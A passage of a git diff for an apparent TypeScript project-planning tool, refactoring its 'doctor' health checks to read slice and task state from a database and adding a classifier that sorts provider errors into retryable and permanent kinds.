+ try { + const MAX_FILE_BYTES = 100 * 1024; // 100KB + const milestonesPath = milestonesDir(basePath); + if (existsSync(milestonesPath)) { + const largeFiles: Array<{ path: string; sizeKB: number }> = []; + function scanForLargeFiles(dir: string, depth = 0): void { + if (depth > 6) return; + try { + for (const entry of readdirSync(dir)) { + const full = join(dir, entry); + try { + const s = statSync(full); + if (s.isDirectory()) { scanForLargeFiles(full, depth + 1); continue; } + if (entry.endsWith(".md") && s.size > MAX_FILE_BYTES) { + largeFiles.push({ path: full.replace(basePath + "/", ""), sizeKB: Math.round(s.size / 1024) }); + } + } catch { /* skip entry */ } + } + } catch { /* skip dir */ } + } + scanForLargeFiles(milestonesPath); + if (largeFiles.length > 0) { + largeFiles.sort((a, b) => b.sizeKB - a.sizeKB); + const worst = largeFiles[0]!; + issues.push({ + severity: "warning", + code: "large_planning_file", + scope: "project", + unitId: "project", + message: `${largeFiles.length} planning file(s) exceed 100KB — largest: ${worst.path} (${worst.sizeKB}KB). Large files cause LLM context pressure.`, + file: worst.path, + fixable: false, + }); + } + } + } catch { + // Non-fatal — large file scan failed + } + + // ── Snapshot ref bloat ──────────────────────────────────────────────── + // refs/gsd/snapshots/ accumulate over time. Prune to newest 5 per label + // when total count exceeds threshold. 
+ try { + if (nativeIsRepo(basePath)) { + const refs = nativeForEachRef(basePath, "refs/gsd/snapshots/"); + if (refs.length > 50) { + issues.push({ + severity: "warning", + code: "snapshot_ref_bloat", + scope: "project", + unitId: "project", + message: `${refs.length} snapshot refs found under refs/gsd/snapshots/ — pruning to newest 5 per label will reclaim git storage`, + fixable: true, + }); + + if (shouldFix("snapshot_ref_bloat")) { + const byLabel = new Map(); + for (const ref of refs) { + const parts = ref.split("/"); + const label = parts.slice(0, -1).join("/"); + if (!byLabel.has(label)) byLabel.set(label, []); + byLabel.get(label)!.push(ref); + } + let pruned = 0; + for (const [, labelRefs] of byLabel) { + const sorted = labelRefs.sort(); + for (const old of sorted.slice(0, -5)) { + try { + nativeUpdateRef(basePath, old); + pruned++; + } catch { /* skip */ } + } + } + if (pruned > 0) { + fixesApplied.push(`pruned ${pruned} old snapshot ref(s)`); + } + } + } + } + } catch { + // Non-fatal — snapshot ref check failed + } +} + +/** + * Build STATE.md markdown content from derived state. + * Local helper used by checkRuntimeHealth for STATE.md drift detection and repair. + */ +function buildStateMarkdownForCheck(state: Awaited>): string { + const lines: string[] = []; + lines.push("# GSD State", ""); + + const activeMilestone = state.activeMilestone + ? `${state.activeMilestone.id}: ${state.activeMilestone.title}` + : "None"; + const activeSlice = state.activeSlice + ? 
`${state.activeSlice.id}: ${state.activeSlice.title}` + : "None"; + + lines.push(`**Active Milestone:** ${activeMilestone}`); + lines.push(`**Active Slice:** ${activeSlice}`); + lines.push(`**Phase:** ${state.phase}`); + if (state.requirements) { + lines.push(`**Requirements Status:** ${state.requirements.active} active · ${state.requirements.validated} validated · ${state.requirements.deferred} deferred · ${state.requirements.outOfScope} out of scope`); + } + lines.push(""); + lines.push("## Milestone Registry"); + + for (const entry of state.registry) { + const glyph = entry.status === "complete" ? "\u2705" : entry.status === "active" ? "\uD83D\uDD04" : entry.status === "parked" ? "\u23F8\uFE0F" : "\u2B1C"; + lines.push(`- ${glyph} **${entry.id}:** ${entry.title}`); + } + + lines.push(""); + lines.push("## Recent Decisions"); + if (state.recentDecisions.length > 0) { + for (const decision of state.recentDecisions) lines.push(`- ${decision}`); + } else { + lines.push("- None recorded"); + } + + lines.push(""); + lines.push("## Blockers"); + if (state.blockers.length > 0) { + for (const blocker of state.blockers) lines.push(`- ${blocker}`); + } else { + lines.push("- None"); + } + + lines.push(""); + lines.push("## Next Action"); + lines.push(state.nextAction || "None"); + lines.push(""); + + return lines.join("\n"); +} diff --git a/src/resources/extensions/gsd/doctor-types.ts b/src/resources/extensions/gsd/doctor-types.ts index 29bce4f7b..8c804b3b8 100644 --- a/src/resources/extensions/gsd/doctor-types.ts +++ b/src/resources/extensions/gsd/doctor-types.ts @@ -3,13 +3,6 @@ export type DoctorIssueCode = | "invalid_preferences" | "missing_tasks_dir" | "missing_slice_plan" - | "task_done_missing_summary" - | "task_summary_without_done_checkbox" - | "all_tasks_done_missing_slice_summary" - | "all_tasks_done_missing_slice_uat" - | "all_tasks_done_roadmap_not_checked" - | "slice_checked_missing_summary" - | "slice_checked_missing_uat" | 
"all_slices_done_missing_milestone_validation" | "all_slices_done_missing_milestone_summary" | "task_done_must_haves_not_verified" @@ -33,6 +26,7 @@ export type DoctorIssueCode = | "unresolvable_dependency" | "failed_migration" | "broken_symlink" + | "numbered_gsd_variant" // Environment health checks (#1221) | "env_node_version" | "env_dependencies" @@ -67,6 +61,8 @@ export type DoctorIssueCode = | "worktree_stale" | "worktree_dirty" | "worktree_unpushed" + // Stale commit safety check + | "stale_uncommitted_changes" // Snapshot ref bloat | "snapshot_ref_bloat" // Runtime data integrity @@ -76,23 +72,13 @@ export type DoctorIssueCode = | "large_planning_file" // Slow environment checks (opt-in via --build / --test flags) | "env_build" - | "env_test"; - -/** - * Issue codes that represent expected completion-transition states. - * These are detected by the doctor but should NOT be auto-fixed at task level — - * they are resolved by the complete-slice/complete-milestone dispatch units. - * Consumers (e.g. auto-post-unit health tracking) should exclude these from - * error counts when running at task fixLevel to avoid false escalation. - * - * Only the slice summary is deferred here because it requires LLM-generated - * content. Roadmap checkbox and UAT stub are mechanical bookkeeping and are - * fixed immediately to avoid inconsistent state if the session stops before - * complete-slice runs (#1808). - */ -export const COMPLETION_TRANSITION_CODES = new Set([ - "all_tasks_done_missing_slice_summary", -]); + | "env_test" + // Engine health checks (Phase 4) + | "db_orphaned_task" + | "db_orphaned_slice" + | "db_done_task_no_summary" + | "db_duplicate_id" + | "projection_drift"; /** * Issue codes that represent global or completion-critical state. 
diff --git a/src/resources/extensions/gsd/doctor.ts b/src/resources/extensions/gsd/doctor.ts index c7daa6b47..b10362efc 100644 --- a/src/resources/extensions/gsd/doctor.ts +++ b/src/resources/extensions/gsd/doctor.ts @@ -1,16 +1,18 @@ import { existsSync, mkdirSync, lstatSync, readdirSync, readFileSync } from "node:fs"; import { join } from "node:path"; -import { loadFile, parsePlan, parseRoadmap, parseSummary, saveFile, parseTaskPlanMustHaves, countMustHavesMentionedInSummary } from "./files.js"; +import { loadFile, parseSummary, saveFile, parseTaskPlanMustHaves, countMustHavesMentionedInSummary } from "./files.js"; +import { parseRoadmap as parseLegacyRoadmap, parsePlan as parseLegacyPlan } from "./parsers-legacy.js"; +import { isDbAvailable, getMilestoneSlices, getSliceTasks } from "./gsd-db.js"; import { resolveMilestoneFile, resolveMilestonePath, resolveSliceFile, resolveSlicePath, resolveTaskFile, resolveTasksDir, milestonesDir, gsdRoot, relMilestoneFile, relSliceFile, relTaskFile, relSlicePath, relGsdRootFile, resolveGsdRootFile, relMilestonePath } from "./paths.js"; import { deriveState, isMilestoneComplete } from "./state.js"; import { invalidateAllCaches } from "./cache.js"; import { loadEffectiveGSDPreferences, type GSDPreferences } from "./preferences.js"; import type { DoctorIssue, DoctorIssueCode, DoctorReport } from "./doctor-types.js"; -import { COMPLETION_TRANSITION_CODES, GLOBAL_STATE_CODES } from "./doctor-types.js"; +import { GLOBAL_STATE_CODES } from "./doctor-types.js"; import type { RoadmapSliceEntry } from "./types.js"; -import { checkGitHealth, checkRuntimeHealth, checkGlobalHealth } from "./doctor-checks.js"; +import { checkGitHealth, checkRuntimeHealth, checkGlobalHealth, checkEngineHealth } from "./doctor-checks.js"; import { checkEnvironmentHealth } from "./doctor-environment.js"; import { runProviderChecks } from "./doctor-providers.js"; @@ -85,7 +87,8 @@ function validatePreferenceShape(preferences: GSDPreferences): string[] { return 
issues; } -function buildStateMarkdown(state: Awaited>): string { +/** Build STATE.md content from derived state. Exported for guided-flow pre-dispatch rebuild (#3475). */ +export function buildStateMarkdown(state: Awaited>): string { const lines: string[] = []; lines.push("# GSD State", ""); @@ -149,167 +152,6 @@ export async function rebuildState(basePath: string): Promise { await saveFile(path, buildStateMarkdown(state)); } -async function ensureSliceSummaryStub(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise { - const path = join(resolveSlicePath(basePath, milestoneId, sliceId) ?? relSlicePath(basePath, milestoneId, sliceId), `${sliceId}-SUMMARY.md`); - const absolute = resolveSliceFile(basePath, milestoneId, sliceId, "SUMMARY") ?? join(resolveSlicePath(basePath, milestoneId, sliceId)!, `${sliceId}-SUMMARY.md`); - const content = [ - "---", - `id: ${sliceId}`, - `parent: ${milestoneId}`, - `milestone: ${milestoneId}`, - "provides: []", - "requires: []", - "affects: []", - "key_files: []", - "key_decisions: []", - "patterns_established: []", - "observability_surfaces:", - " - none yet \u2014 doctor created placeholder summary; replace with real diagnostics before treating as complete", - "drill_down_paths: []", - "duration: unknown", - "verification_result: unknown", - `completed_at: ${new Date().toISOString()}`, - "---", - "", - `# ${sliceId}: Recovery placeholder summary`, - "", - "**Doctor-created placeholder.**", - "", - "## What Happened", - "Doctor detected that all tasks were complete but the slice summary was missing. 
Replace this with a real compressed slice summary before relying on it.", - "", - "## Verification", - "Not re-run by doctor.", - "", - "## Deviations", - "Recovery placeholder created to restore required artifact shape.", - "", - "## Known Limitations", - "This file is intentionally incomplete and should be replaced by a real summary.", - "", - "## Follow-ups", - "- Regenerate this summary from task summaries.", - "", - "## Files Created/Modified", - `- \`${relSliceFile(basePath, milestoneId, sliceId, "SUMMARY")}\` \u2014 doctor-created placeholder summary`, - "", - "## Forward Intelligence", - "", - "### What the next slice should know", - "- Doctor had to reconstruct completion artifacts; inspect task summaries before continuing.", - "", - "### What's fragile", - "- Placeholder summary exists solely to unblock invariant checks.", - "", - "### Authoritative diagnostics", - "- Task summaries in the slice tasks/ directory \u2014 they are the actual authoritative source until this summary is rewritten.", - "", - "### What assumptions changed", - "- The system assumed completion would always write a slice summary; in practice doctor may need to restore missing artifacts.", - "", - ].join("\n"); - await saveFile(absolute, content); - fixesApplied.push(`created placeholder ${absolute}`); -} - -async function ensureSliceUatStub(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise { - const sDir = resolveSlicePath(basePath, milestoneId, sliceId); - if (!sDir) return; - const absolute = join(sDir, `${sliceId}-UAT.md`); - const content = [ - `# ${sliceId}: Recovery placeholder UAT`, - "", - `**Milestone:** ${milestoneId}`, - `**Written:** ${new Date().toISOString()}`, - "", - "## Preconditions", - "- Doctor created this placeholder because the expected UAT file was missing.", - "", - "## Smoke Test", - "- Re-run the slice verification from the slice plan before shipping.", - "", - "## Test Cases", - "### 1. 
Replace this placeholder", - "1. Read the slice plan and task summaries.", - "2. Write a real UAT script.", - "3. **Expected:** This placeholder is replaced with meaningful human checks.", - "", - "## Edge Cases", - "### Missing completion artifacts", - "1. Confirm the summary, roadmap checkbox, and state file are coherent.", - "2. **Expected:** GSD doctor reports no remaining completion drift for this slice.", - "", - "## Failure Signals", - "- Placeholder content still present when treating the slice as done", - "", - "## Notes for Tester", - "Doctor created this file only to restore the required artifact shape. Replace it with a real UAT script.", - "", - ].join("\n"); - await saveFile(absolute, content); - fixesApplied.push(`created placeholder ${absolute}`); -} - -async function markTaskDoneInPlan(basePath: string, milestoneId: string, sliceId: string, taskId: string, fixesApplied: string[]): Promise { - const planPath = resolveSliceFile(basePath, milestoneId, sliceId, "PLAN"); - if (!planPath) return; - const content = await loadFile(planPath); - if (!content) return; - const updated = content.replace( - new RegExp(`^(\\s*-\\s+)\\[ \\]\\s+\\*\\*${taskId}:`, "m"), - `$1[x] **${taskId}:`, - ); - if (updated !== content) { - await saveFile(planPath, updated); - fixesApplied.push(`marked ${taskId} done in ${planPath}`); - } -} - -async function markTaskUndoneInPlan(basePath: string, milestoneId: string, sliceId: string, taskId: string, fixesApplied: string[]): Promise { - const planPath = resolveSliceFile(basePath, milestoneId, sliceId, "PLAN"); - if (!planPath) return; - const content = await loadFile(planPath); - if (!content) return; - const updated = content.replace( - new RegExp(`^(\\s*-\\s+)\\[x\\]\\s+\\*\\*${taskId}:`, "mi"), - `$1[ ] **${taskId}:`, - ); - if (updated !== content) { - await saveFile(planPath, updated); - fixesApplied.push(`unchecked ${taskId} in ${planPath} (missing summary — task will re-execute)`); - } -} - -async function 
markSliceDoneInRoadmap(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise { - const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); - if (!roadmapPath) return; - const content = await loadFile(roadmapPath); - if (!content) return; - const updated = content.replace( - new RegExp(`^(\\s*-\\s+)\\[ \\]\\s+\\*\\*${sliceId}:`, "m"), - `$1[x] **${sliceId}:`, - ); - if (updated !== content) { - await saveFile(roadmapPath, updated); - fixesApplied.push(`marked ${sliceId} done in ${roadmapPath}`); - } -} - -async function markSliceUndoneInRoadmap(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise { - const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); - if (!roadmapPath) return; - const content = await loadFile(roadmapPath); - if (!content) return; - const updated = content.replace( - new RegExp(`^(\\s*-\\s+)\\[x\\]\\s+\\*\\*${sliceId}:`, "m"), - `$1[ ] **${sliceId}:`, - ); - if (updated !== content) { - await saveFile(roadmapPath, updated); - fixesApplied.push(`unmarked ${sliceId} in ${roadmapPath} (premature completion)`); - } -} - function matchesScope(unitId: string, scope?: string): boolean { if (!scope) return true; return unitId === scope || unitId.startsWith(`${scope}/`); @@ -374,8 +216,14 @@ export async function selectDoctorScope(basePath: string, requestedScope?: strin const roadmapPath = resolveMilestoneFile(basePath, milestone.id, "ROADMAP"); const roadmapContent = roadmapPath ? 
await loadFile(roadmapPath) : null; if (!roadmapContent) continue; - const roadmap = parseRoadmap(roadmapContent); - if (!isMilestoneComplete(roadmap)) return milestone.id; + if (isDbAvailable()) { + const dbSlices = getMilestoneSlices(milestone.id); + const allDone = dbSlices.length > 0 && dbSlices.every(s => s.status === "complete"); + if (!allDone) return milestone.id; + } else { + const roadmap = parseLegacyRoadmap(roadmapContent); + if (!isMilestoneComplete(roadmap)) return milestone.id; + } } return state.registry[0]?.id; @@ -490,18 +338,10 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; /** Whether a given issue code should be auto-fixed at the current fixLevel. */ const shouldFix = (code: DoctorIssueCode): boolean => { if (!fix || dryRun) return false; - if (fixLevel === "task" && COMPLETION_TRANSITION_CODES.has(code)) return false; if (fixLevel === "task" && GLOBAL_STATE_CODES.has(code)) return false; return true; }; - /** Log a dry-run "would fix" entry when fix=true but dryRun=true. */ - const dryRunCanFix = (code: DoctorIssueCode, message: string): void => { - if (dryRun && fix && !(fixLevel === "task" && COMPLETION_TRANSITION_CODES.has(code))) { - fixesApplied.push(`[dry-run] would fix: ${message}`); - } - }; - const prefs = loadEffectiveGSDPreferences(); if (prefs) { const prefIssues = validatePreferenceShape(prefs.preferences); @@ -521,8 +361,8 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; // Git health checks — timed const t0git = Date.now(); const isolationMode: "none" | "worktree" | "branch" = options?.isolationMode ?? - (prefs?.preferences?.git?.isolation === "none" ? "none" : - prefs?.preferences?.git?.isolation === "branch" ? "branch" : "worktree"); + (prefs?.preferences?.git?.isolation === "worktree" ? "worktree" : + prefs?.preferences?.git?.isolation === "branch" ? 
"branch" : "none"); await checkGitHealth(basePath, issues, fixesApplied, shouldFix, isolationMode); const gitMs = Date.now() - t0git; @@ -543,6 +383,9 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; }); const envMs = Date.now() - t0env; + // Engine health checks — DB constraints and projection drift + await checkEngineHealth(basePath, issues, fixesApplied); + const milestonesPath = milestonesDir(basePath); if (!existsSync(milestonesPath)) { const report: DoctorReport = { ok: issues.every(i => i.severity !== "error"), basePath, issues, fixesApplied, timing: { git: gitMs, runtime: runtimeMs, environment: envMs, gsdState: 0 } }; @@ -629,7 +472,34 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null; if (!roadmapContent) continue; - const roadmap = parseRoadmap(roadmapContent); + + // Normalize slices: prefer DB, fall back to parser + type NormSlice = RoadmapSliceEntry & { pending?: boolean }; + let slices: NormSlice[]; + if (isDbAvailable()) { + const dbSlices = getMilestoneSlices(milestoneId); + slices = dbSlices.map(s => ({ + id: s.id, + title: s.title, + done: s.status === "complete", + pending: s.status === "pending", + risk: (s.risk || "medium") as RoadmapSliceEntry["risk"], + depends: s.depends, + demo: s.demo, + })); + } else { + const activeMilestoneId = state.activeMilestone?.id; + const activeSliceId = state.activeSlice?.id; + slices = parseLegacyRoadmap(roadmapContent).slices.map(s => ({ + ...s, + // Legacy roadmaps only encode done vs not-done. For doctor's + // missing-directory checks, treat every undone slice except the + // current active slice as effectively pending/unstarted. 
+ pending: !s.done && (milestoneId !== activeMilestoneId || s.id !== activeSliceId), + })); + } + // Wrap in Roadmap-compatible shape for detectCircularDependencies + const roadmap = { slices }; // ── Circular dependency detection ────────────────────────────────────── for (const cycle of detectCircularDependencies(roadmap.slices)) { @@ -707,6 +577,9 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; const slicePath = resolveSlicePath(basePath, milestoneId, slice.id); if (!slicePath) { + // Pending slices haven't been planned yet — directories are created + // lazily by ensurePreconditions() at dispatch time. Skip them. + if (slice.pending) continue; const expectedPath = relSlicePath(basePath, milestoneId, slice.id); issues.push({ severity: slice.done ? "warning" : "error", @@ -729,6 +602,8 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; const tasksDir = resolveTasksDir(basePath, milestoneId, slice.id); if (!tasksDir) { + // Pending slices haven't been planned yet — tasks/ is created on demand. + if (slice.pending) continue; issues.push({ severity: slice.done ? "warning" : "error", code: "missing_tasks_dir", @@ -748,7 +623,17 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; const planPath = resolveSliceFile(basePath, milestoneId, slice.id, "PLAN"); const planContent = planPath ? await loadFile(planPath) : null; - const plan = planContent ? 
parsePlan(planContent) : null; + // Normalize plan tasks: prefer DB, fall back to parsers-legacy + let plan: { tasks: Array<{ id: string; done: boolean; title: string; estimate?: string }> } | null = null; + if (isDbAvailable()) { + const dbTasks = getSliceTasks(milestoneId, slice.id); + if (dbTasks.length > 0) { + plan = { tasks: dbTasks.map(t => ({ id: t.id, done: t.status === "complete" || t.status === "done", title: t.title, estimate: t.estimate || undefined })) }; + } + } + if (!plan && planContent) { + plan = parseLegacyPlan(planContent); + } if (!plan) { if (!slice.done) { issues.push({ @@ -792,42 +677,11 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; } catch { /* non-fatal */ } let allTasksDone = plan.tasks.length > 0; - let taskUncheckedByDoctor = false; for (const task of plan.tasks) { const taskUnitId = `${unitId}/${task.id}`; const summaryPath = resolveTaskFile(basePath, milestoneId, slice.id, task.id, "SUMMARY"); const hasSummary = !!(summaryPath && await loadFile(summaryPath)); - if (task.done && !hasSummary) { - issues.push({ - severity: "error", - code: "task_done_missing_summary", - scope: "task", - unitId: taskUnitId, - message: `Task ${task.id} is marked done but summary is missing — unchecking so it re-executes`, - file: relSliceFile(basePath, milestoneId, slice.id, "PLAN"), - fixable: true, - }); - dryRunCanFix("task_done_missing_summary", `uncheck ${task.id} in plan for ${taskUnitId}`); - if (shouldFix("task_done_missing_summary")) { - await markTaskUndoneInPlan(basePath, milestoneId, slice.id, task.id, fixesApplied); - taskUncheckedByDoctor = true; - } - } - - if (!task.done && hasSummary) { - issues.push({ - severity: "warning", - code: "task_summary_without_done_checkbox", - scope: "task", - unitId: taskUnitId, - message: `Task ${task.id} has a summary but is not marked done in the slice plan`, - file: relSliceFile(basePath, milestoneId, slice.id, "PLAN"), - fixable: true, - }); - if (fix) await 
markTaskDoneInPlan(basePath, milestoneId, slice.id, task.id, fixesApplied); - } - // Must-have verification if (task.done && hasSummary) { const taskPlanPath = resolveTaskFile(basePath, milestoneId, slice.id, task.id, "PLAN"); @@ -875,18 +729,11 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; allTasksDone = allTasksDone && task.done; } - // ── #1850: cascade slice uncheck when task_done_missing_summary fires ── - // When doctor unchecks tasks inside a done slice, the slice must also be - // unchecked so the state machine re-enters the executing phase. Without - // this, state.ts skips done slices and the unchecked tasks never run, - // causing doctor to fire again on every start (infinite loop). - if (taskUncheckedByDoctor && slice.done) { - await markSliceUndoneInRoadmap(basePath, milestoneId, slice.id, fixesApplied); - } - // Blocker-without-replan detection + // Skip when all tasks are done — the blocker was implicitly resolved + // within the task and the slice is not stuck (#3105 Bug 2). 
const replanPath = resolveSliceFile(basePath, milestoneId, slice.id, "REPLAN"); - if (!replanPath) { + if (!replanPath && !allTasksDone) { for (const task of plan.tasks) { if (!task.done) continue; const summaryPath = resolveTaskFile(basePath, milestoneId, slice.id, task.id, "SUMMARY"); @@ -916,88 +763,11 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; file: relSliceFile(basePath, milestoneId, slice.id, "REPLAN"), fixable: false }); } - const sliceSummaryPath = resolveSliceFile(basePath, milestoneId, slice.id, "SUMMARY"); - const sliceUatPath = join(slicePath, `${slice.id}-UAT.md`); - const hasSliceSummary = !!(sliceSummaryPath && await loadFile(sliceSummaryPath)); - const hasSliceUat = existsSync(sliceUatPath); - - if (allTasksDone && !hasSliceSummary) { - issues.push({ - severity: "error", - code: "all_tasks_done_missing_slice_summary", - scope: "slice", - unitId, - message: `All tasks are done but ${slice.id}-SUMMARY.md is missing`, - file: relSliceFile(basePath, milestoneId, slice.id, "SUMMARY"), - fixable: true, - }); - dryRunCanFix("all_tasks_done_missing_slice_summary", `create placeholder summary for ${unitId}`); - if (shouldFix("all_tasks_done_missing_slice_summary")) await ensureSliceSummaryStub(basePath, milestoneId, slice.id, fixesApplied); - } - - if (allTasksDone && !hasSliceUat) { - issues.push({ - severity: "warning", - code: "all_tasks_done_missing_slice_uat", - scope: "slice", - unitId, - message: `All tasks are done but ${slice.id}-UAT.md is missing`, - file: `${relSlicePath(basePath, milestoneId, slice.id)}/${slice.id}-UAT.md`, - fixable: true, - }); - dryRunCanFix("all_tasks_done_missing_slice_uat", `create placeholder UAT for ${unitId}`); - if (shouldFix("all_tasks_done_missing_slice_uat")) await ensureSliceUatStub(basePath, milestoneId, slice.id, fixesApplied); - } - - if (allTasksDone && !slice.done) { - issues.push({ - severity: "error", - code: "all_tasks_done_roadmap_not_checked", - scope: "slice", - 
unitId, - message: `All tasks are done but roadmap still shows ${slice.id} as incomplete`, - file: relMilestoneFile(basePath, milestoneId, "ROADMAP"), - fixable: true, - }); - dryRunCanFix("all_tasks_done_roadmap_not_checked", `mark ${slice.id} done in roadmap`); - if (shouldFix("all_tasks_done_roadmap_not_checked") && (hasSliceSummary || existsSync(join(slicePath, `${slice.id}-SUMMARY.md`)))) { - await markSliceDoneInRoadmap(basePath, milestoneId, slice.id, fixesApplied); - } - } - - if (slice.done && !hasSliceSummary) { - issues.push({ - severity: "error", - code: "slice_checked_missing_summary", - scope: "slice", - unitId, - message: `Roadmap marks ${slice.id} complete but slice summary is missing`, - file: relSliceFile(basePath, milestoneId, slice.id, "SUMMARY"), - fixable: true, - }); - if (!allTasksDone) { - dryRunCanFix("slice_checked_missing_summary", `uncheck ${slice.id} in roadmap (tasks incomplete)`); - if (shouldFix("slice_checked_missing_summary")) { - await markSliceUndoneInRoadmap(basePath, milestoneId, slice.id, fixesApplied); - } - } - } - - if (slice.done && !hasSliceUat) { - issues.push({ - severity: "warning", - code: "slice_checked_missing_uat", - scope: "slice", - unitId, - message: `Roadmap marks ${slice.id} complete but UAT file is missing`, - file: `${relSlicePath(basePath, milestoneId, slice.id)}/${slice.id}-UAT.md`, - fixable: true, - }); - } } // Milestone-level check: all slices done but no validation file - if (isMilestoneComplete(roadmap) && !resolveMilestoneFile(basePath, milestoneId, "VALIDATION") && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) { + const milestoneComplete = roadmap.slices.length > 0 && roadmap.slices.every(s => s.done); + if (milestoneComplete && !resolveMilestoneFile(basePath, milestoneId, "VALIDATION") && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) { issues.push({ severity: "info", code: "all_slices_done_missing_milestone_validation", @@ -1010,7 +780,7 @@ export async function 
runGSDDoctor(basePath: string, options?: { fix?: boolean; } // Milestone-level check: all slices done but no milestone summary - if (isMilestoneComplete(roadmap) && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) { + if (milestoneComplete && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) { issues.push({ severity: "warning", code: "all_slices_done_missing_milestone_summary", diff --git a/src/resources/extensions/gsd/error-classifier.ts b/src/resources/extensions/gsd/error-classifier.ts new file mode 100644 index 000000000..604167451 --- /dev/null +++ b/src/resources/extensions/gsd/error-classifier.ts @@ -0,0 +1,141 @@ +/** + * Unified error classifier for provider/network/server errors. + * + * Consolidates patterns from: + * - isTransientNetworkError() in preferences-models.ts + * - classifyProviderError() in provider-error-pause.ts + * + * Single entry point: classifyError(errorMsg, retryAfterMs?) + * + * @see https://github.com/gsd-build/gsd/issues/2577 + */ + +// ── ErrorClass discriminated union ────────────────────────────────────────── + +export type ErrorClass = + | { kind: "network"; retryAfterMs: number } + | { kind: "rate-limit"; retryAfterMs: number } + | { kind: "server"; retryAfterMs: number } + | { kind: "stream"; retryAfterMs: number } + | { kind: "connection"; retryAfterMs: number } + | { kind: "model-error" } + | { kind: "permanent" } + | { kind: "unknown" }; + +// ── RetryState ────────────────────────────────────────────────────────────── + +export interface RetryState { + networkRetryCount: number; + consecutiveTransientCount: number; + currentRetryModelId: string | undefined; +} + +export function createRetryState(): RetryState { + return { networkRetryCount: 0, consecutiveTransientCount: 0, currentRetryModelId: undefined }; +} + +export function resetRetryState(state: RetryState): void { + state.networkRetryCount = 0; + state.consecutiveTransientCount = 0; + state.currentRetryModelId = undefined; +} + +// ── Classification 
────────────────────────────────────────────────────────── + +const PERMANENT_RE = /auth|unauthorized|forbidden|invalid.*key|invalid.*api|billing|quota exceeded|account/i; +const RATE_LIMIT_RE = /rate.?limit|too many requests|429/i; +const NETWORK_RE = /network|ECONNRESET|ETIMEDOUT|ECONNREFUSED|socket hang up|fetch failed|connection.*reset|dns/i; +const SERVER_RE = /internal server error|500|502|503|overloaded|server_error|api_error|service.?unavailable/i; +// ECONNRESET/ECONNREFUSED are in NETWORK_RE (same-model retry first). +const CONNECTION_RE = /terminated|connection.?refused|other side closed|EPIPE|network.?(?:is\s+)?unavailable|stream_exhausted(?:_without_result)?/i; +// Catch-all for V8 JSON.parse errors: all modern variants end with "in JSON at position \d+". +// This eliminates the need to enumerate every error message variant individually. +const STREAM_RE = /in JSON at position \d+|Unexpected end of JSON|SyntaxError.*JSON/i; +const RESET_DELAY_RE = /reset in (\d+)s/i; + +/** + * Classify an error message into one of the ErrorClass kinds. + * + * Classification order: + * 1. Permanent (auth/billing/quota) — unless also rate-limited + * 2. Rate limit (429, rate.?limit, too many requests) + * 3. Network (ECONNRESET, ETIMEDOUT, socket hang up, fetch failed, dns) + * 4. Stream truncation (malformed JSON from mid-stream cut) + * 5. Server (500/502/503, overloaded, server_error) + * 6. Connection (terminated, ECONNREFUSED, EPIPE, other side closed) + * 7. Unknown + */ +export function classifyError(errorMsg: string, retryAfterMs?: number): ErrorClass { + const isPermanent = PERMANENT_RE.test(errorMsg); + const isRateLimit = RATE_LIMIT_RE.test(errorMsg); + + // 1. Permanent — but rate limit takes precedence + if (isPermanent && !isRateLimit) { + return { kind: "permanent" }; + } + + // 2. 
Rate limit + if (isRateLimit) { + if (retryAfterMs != null && retryAfterMs > 0) { + return { kind: "rate-limit", retryAfterMs }; + } + const resetMatch = errorMsg.match(RESET_DELAY_RE); + const delayMs = resetMatch ? Number(resetMatch[1]) * 1000 : 60_000; + return { kind: "rate-limit", retryAfterMs: delayMs }; + } + + // 3. Network errors — same-model retry candidate + if (NETWORK_RE.test(errorMsg)) { + // Exclude if also matches permanent signals (already handled above for + // rate-limit, but double-check for non-rate-limit permanent overlap like + // "billing" appearing alongside "network"). + return { kind: "network", retryAfterMs: retryAfterMs ?? 3_000 }; + } + + // 4. Stream truncation — downstream symptom of connection drop + if (STREAM_RE.test(errorMsg)) { + return { kind: "stream", retryAfterMs: retryAfterMs ?? 15_000 }; + } + + // 5. Server errors — try fallback model + if (SERVER_RE.test(errorMsg)) { + return { kind: "server", retryAfterMs: retryAfterMs ?? 30_000 }; + } + + // 6. Connection errors — try fallback model + if (CONNECTION_RE.test(errorMsg)) { + return { kind: "connection", retryAfterMs: retryAfterMs ?? 15_000 }; + } + + // 7. Unknown + return { kind: "unknown" }; +} + +// ── Helpers ───────────────────────────────────────────────────────────────── + +/** Returns true for all transient (auto-resumable) error kinds. */ +export function isTransient(cls: ErrorClass): boolean { + switch (cls.kind) { + case "network": + case "rate-limit": + case "server": + case "stream": + case "connection": + return true; + default: + return false; + } +} + +/** + * Backward-compatible thin wrapper. + * + * Returns true when the error is a transient *network* error specifically + * (worth retrying the same model). Permanent signals (auth, billing, quota) + * cause this to return false even if a network keyword is present. 
